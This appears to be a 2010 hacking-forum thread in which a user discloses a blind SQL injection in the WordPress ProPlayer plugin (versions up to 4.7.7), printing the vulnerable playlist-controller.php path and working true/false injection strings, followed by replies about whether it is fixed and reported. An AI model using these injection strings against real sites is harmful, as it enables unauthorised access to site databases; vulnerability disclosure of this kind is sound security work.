Pages: [1]

Author Topic: WP-ProPlayer Plugin Blind SQL Injection  (Read 1593 times)

0 Members and 1 Guest are viewing this topic.

Offline ca0s

  • VIP
  • Knight
  • *
  • Posts: 396
  • Reputation: +46
  • Gender: Male
  • ca0s@ka0labs #
    • View Profile
    • { st4ck~3rr0r }
WP-ProPlayer Plugin Blind SQL Injection
« on: December 11, 2010, 11:09:09 pm »
<-------

   WP-ProPlayer Blind SQL Inyection

   Founder: Ca0s

   Visit:
      st4ck-3rr0r.blogspot.com
      ka0-labs.org
   Shouts @
      evilzone.org
      elhacker.net
      diosdelared.com

------->
<-------

   Software: ProPlayer <= 4.7.7
   URL:
      http://wordpress.org/extend/plugins/proplayer/
      http://isagoksu.com/proplayer-wordpress-plugin/
   Vuln: Blind SQL Inyection ->
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

   Note: some servers filter ' to %27 so wont work this way.

------->
Logged

Online ande

  • Administrator
  • Legend
  • *
  • Posts: 2134
  • Reputation: +167
  • Gender: Male
    • View Profile
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #1 on: December 12, 2010, 12:06:11 am »
Vulnerability status? I couldn't find any fix notes on their site.
Logged

Offline ca0s

  • VIP
  • Knight
  • *
  • Posts: 396
  • Reputation: +46
  • Gender: Male
  • ca0s@ka0labs #
    • View Profile
    • { st4ck~3rr0r }
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #2 on: December 12, 2010, 12:58:06 am »
Unfixed.
I reported it to author.
Logged

Online ande

  • Administrator
  • Legend
  • *
  • Posts: 2134
  • Reputation: +167
  • Gender: Male
    • View Profile
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #3 on: December 12, 2010, 01:04:08 am »
Quote from: ca0s on December 12, 2010, 12:58:06 am
Unfixed.
I reported it to author.

Sweet, better hope they fix it quick :P
Logged

Offline solar

  • NULL
  • Posts: 1
  • Reputation: +0
    • View Profile
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #4 on: February 25, 2011, 07:24:13 pm »
Cool... nice find.
Logged
Pages: [1]
 



Intern0t SoldierX py1337 SecurityOverride programisiai iExploit
Want to be here? Contact Ande, Bluechill or Kulverstukas on the forum or at IRC.